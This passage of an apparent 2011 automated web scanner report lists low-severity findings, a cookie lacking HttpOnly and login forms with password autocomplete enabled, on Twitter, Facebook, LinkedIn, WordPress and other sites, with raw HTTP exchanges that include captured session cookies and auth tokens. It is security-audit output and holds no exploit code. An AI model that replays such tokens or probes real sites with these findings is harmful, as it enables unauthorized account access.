Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 13:57:51 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 26659


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
7.46. http://zune.net/xweb/www/cms/templates/flexpage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://zune.net
Path:   /xweb/www/cms/templates/flexpage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xweb/www/cms/templates/flexpage.aspx HTTP/1.1
Host: zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 06 Jul 2011 13:56:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
lx-svr: S504
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 13:56:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
8. Password field with autocomplete enabled  previous  next
There are 31 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

8.1. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309951242-13485-35848
ETag: "f6755023a327c6a2088b2fbeac26c125"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:20:42 GMT
X-Runtime: 0.01159
Content-Type: text/html; charset=utf-8
Content-Length: 50119
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: dcf60bc401b809082ca7be8e145145d313a72168
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0YTQ1YzQzMmQz%250AYTU6D2NyZWF0ZWRfYXRsKwgM4Sj%252FMAEiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkNDQ5%250ANTQwNjk5YTQ4ZDU0NjNlZjhmNDNiYWM3MjQyNQ%253D%253D--5d4a05ccb95564ae2061eeaf406e3ab4f4a78a92; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<div id="signin-dropdown" class="dropdown dark">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
</span>
<input type="password" value="" name="session[password]" />
</label>
...[SNIP]...
8.2. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309951242-13485-35848
ETag: "f6755023a327c6a2088b2fbeac26c125"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:20:42 GMT
X-Runtime: 0.01159
Content-Type: text/html; charset=utf-8
Content-Length: 50119
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: dcf60bc401b809082ca7be8e145145d313a72168
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0YTQ1YzQzMmQz%250AYTU6D2NyZWF0ZWRfYXRsKwgM4Sj%252FMAEiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkNDQ5%250ANTQwNjk5YTQ4ZDU0NjNlZjhmNDNiYWM3MjQyNQ%253D%253D--5d4a05ccb95564ae2061eeaf406e3ab4f4a78a92; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
<div class="front-signin">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="session[password]" title="Password" />
<span class="holder">
...[SNIP]...
8.3. http://twitter.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309951242-13485-35848
ETag: "f6755023a327c6a2088b2fbeac26c125"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:20:42 GMT
X-Runtime: 0.01159
Content-Type: text/html; charset=utf-8
Content-Length: 50119
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: dcf60bc401b809082ca7be8e145145d313a72168
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0YTQ1YzQzMmQz%250AYTU6D2NyZWF0ZWRfYXRsKwgM4Sj%252FMAEiCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiVkNDQ5%250ANTQwNjk5YTQ4ZDU0NjNlZjhmNDNiYWM3MjQyNQ%253D%253D--5d4a05ccb95564ae2061eeaf406e3ab4f4a78a92; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />


<script type="text/javascript" charset="utf-8">


...[SNIP]...
</h3>
<form action="https://twitter.com/signup" class="signup signup-btn" method="post">
<div class="holding name">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="user[user_password]"/>
<span class="holder">
...[SNIP]...
8.4. http://twitter.com/intent/session  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /intent/session

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /intent/session?return_to=%2Fintent%2Ftweet%3Fsource%3Dwebclient%26text%3Dhttps%253A%252F%252Fwww.microsoft.com%252Fpresspass%252Fpresskits%252FDCU%252Fdefault.aspx&source=webclient&text=https%3A%2F%2Fwww.microsoft.com%2Fpresspass%2Fpresskits%2FDCU%2Fdefault.aspx HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: js=1; __utmz=43838368.1308923300.10.3.utmcsr=support.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/app/answers/detail/a_id/4394; __utma=43838368.1598605414.1305368954.1308913365.1308923300.10; k=173.193.214.243.1309445969207029; guest_id=v1%3A13086187569807267; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--68bfb23ecb75192721faa31141f4cc93644031bd

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:15:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309950927-60253-54088
ETag: "36b99243bfb315e43cf77ffb34f0123a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 11:15:27 GMT
X-Runtime: 0.01137
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8d1959539e4fb4977e5ce9becc49dc0a878abe53
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCAzhKP8wAToHaWQiJWQ0NDk1NDA2OTlhNDhk%250ANTQ2M2VmOGY0M2JhYzcyNDI1Ogxjc3JmX2lkIiUzZTA3YTMyYzhmOThkYmNi%250AMTRlMzRhNDVjNDMyZDNhNSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--14f6b43e796db4ce15e8d70d84d63b17d3a42eef; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 4344
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width; initial-scale=1.0;
...[SNIP]...
<div id="bd" role="main">

<form action="/intent/session" id="login-form" method="post"><div style="margin:0;padding:0">
...[SNIP]...
</label>
<input aria-required="true" class="password" id="password" name="session[password]" required="required" type="password" value="" />
</div>
...[SNIP]...
8.5. https://wordpress.com/wp-login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://wordpress.com
Path:   /wp-login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /wp-login.php HTTP/1.1
Host: wordpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 06 Jul 2011 11:21:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: hiab=on; path=/; domain=.wordpress.com
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; domain=.wordpress.com
Content-Length: 3666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <meta
...[SNIP]...
</h1>

<form name="loginform" id="loginform" action="https://wordpress.com/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...
8.6. http://www.bebo.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.bebo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 26956
Date: Wed, 06 Jul 2011 11:21:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</h2>
   
       <form id="login-form" action="https://secure.bebo.com/SignIn.jsp" method="post">
   <table cellpadding="0" cellspacing="0" border="0">
...[SNIP]...
<td>
       <input type="password" class="text-input" name="Password" style="display:none;" />
       <input type="text" class="text-input password-text inactive" value="Password" tabindex="2" />
...[SNIP]...
8.7. https://www.drtserver.com/microsoft/1/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.drtserver.com
Path:   /microsoft/1/login.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /microsoft/1/login.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.drtserver.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Thu, 07 Jul 2011 13:27:09 GMT
Server: Apache/2.2.16 (Unix)
Location: https://www.microsoftaffiliates.com/index.html?content=Microsoft
X-Server-Name: www@dc1dtweb59
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17547

<html>
<script language="JavaScript">
<!--
function medopen() {
   coolopenWindow=window.open("/flash/mediakit.html","medopen","scrollbars=0,menubar=0,statusbar=0,toolbar=0,height=560,width=362,out
...[SNIP]...
<td class="login">
   
<form method="POST" action="https://www.microsoftaffiliates.com/" style="margin:0; padding:0 0 0 40px;">

Email / Affiliate ID:&nbsp;&nbsp;
<input name="DL_AUTH_USERNAME" type="text" class="login-text">

&nbsp;&nbsp;Password:&nbsp;&nbsp;
<input name="DL_AUTH_PASSWORD" type="password" class="login-text">
<input type="hidden" name="next" value="/">
...[SNIP]...
8.8. http://www.evernote.com/clip.action  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.evernote.com
Path:   /clip.action

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /clip.action?url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US HTTP/1.1
Host: www.evernote.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: shard=deleteme; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cookieTestValue=1309951281866; Version=1; Max-Age=378432000; Expires=Mon, 03-Jul-2023 11:21:21 GMT; Path=/
Set-Cookie: JSESSIONID=533B63D3D80594249497C75E3B0979D4; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Wed, 06 Jul 2011 11:21:21 GMT
Connection: close
Server: Evernote/1.0
Content-Length: 8523


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!
...[SNIP]...
</h2>

<form id="login_form" name="login_form" action="https://www.evernote.com/Login.action" method="post">

<table width="100%" border="0" cellspacing="0"
cellpadding="0" summary="Sign in form">
...[SNIP]...
<td><input id="password" maxlength="64" style="width: 170px" name="password" class="text" type="password" /></td>
...[SNIP]...
8.9. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...
8.10. http://www.fark.com/cgi/farkit.pl  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
<div id="loginBoxesNoScript">
    <form method="post" enctype="application/x-www-form-urlencoded" action="https://www.fark.com/login">
            <div class="loginSectionNoScript submitLogin">
...[SNIP]...
</label>
               <input type="password" name="passwd" id="loginPass_ns">
           </div>
...[SNIP]...
8.11. http://www.fark.com/cgi/farkit.pl  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
</div> <form method="post" enctype="application/x-www-form-urlencoded" action="https://www.fark.com/login">
    <input type="hidden" name="continue" value="H50d9o3tJw4Di1Vou0rBz5DiSq8C6Zs8GiiKMvpAs3OeTKywEi5C7gLgEa-8vEJj0gReKvR_u-tIqEKD">
...[SNIP]...
</label>
<input type="password" name="passwd" id="loginPass">
</div>
...[SNIP]...
8.12. http://www.linkedin.com/shareArticle  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:93DIfn6pEjjvFpbrPCwqLaeaMjj-1DOra9DURRE1_gdw92SrsI2wg9:1309951282:71f9fdf64b90fac7cb9339589e3ed534ca703d1e"; Version=1; Max-Age=1799; Expires=Wed, 06-Jul-2011 11:51:21 GMT; Path=/
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:1274968938822400364"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: bcookie="v=1&96d058ca-285d-4b2d-96c8-f61d525270fc"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Mon, 24-Jul-2079 14:35:29 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 11:21:21 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Wed, 06-Jul-2011 11:53:13 GMT;path=/;httponly
Content-Length: 8493

<!DOCTYPE html>
<html lang="en">
<head>


<script type="text/jav
...[SNIP]...
</a>


<form action="https://www.linkedin.com/secure/login" method="POST" accept-charset="UTF-8" name="login"> <input type="hidden" name="csrfToken" value="ajax:1274968938822400364">
...[SNIP]...
<div class="elem">
<input type="password" name="session_password" value="" id="session_password-login" class="inpt">
</div>
...[SNIP]...
8.13. http://www.sipc.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sipc.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 13:57:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIPC - Securities Investor Protection Corporation</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</td>
<form name="login" method="post" action="claim/module/login.cfm" target="_blank" onSubmit = "return checkForm(this);"><td width="95" bgcolor="#CBD4CB">
...[SNIP]...
</div>
<input type="Password" name="password" style="width:90px;">
<div style="padding-top:8px;">
...[SNIP]...
8.14. http://www.softlayer.com/about/analyst-relations/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/analyst-relations/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /about/analyst-relations/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 22617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" /></div>
...[SNIP]...
8.15. http://www.softlayer.com/about/careers/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/careers/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /about/careers/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform"><div
class="portal">
...[SNIP]...
</label> <input
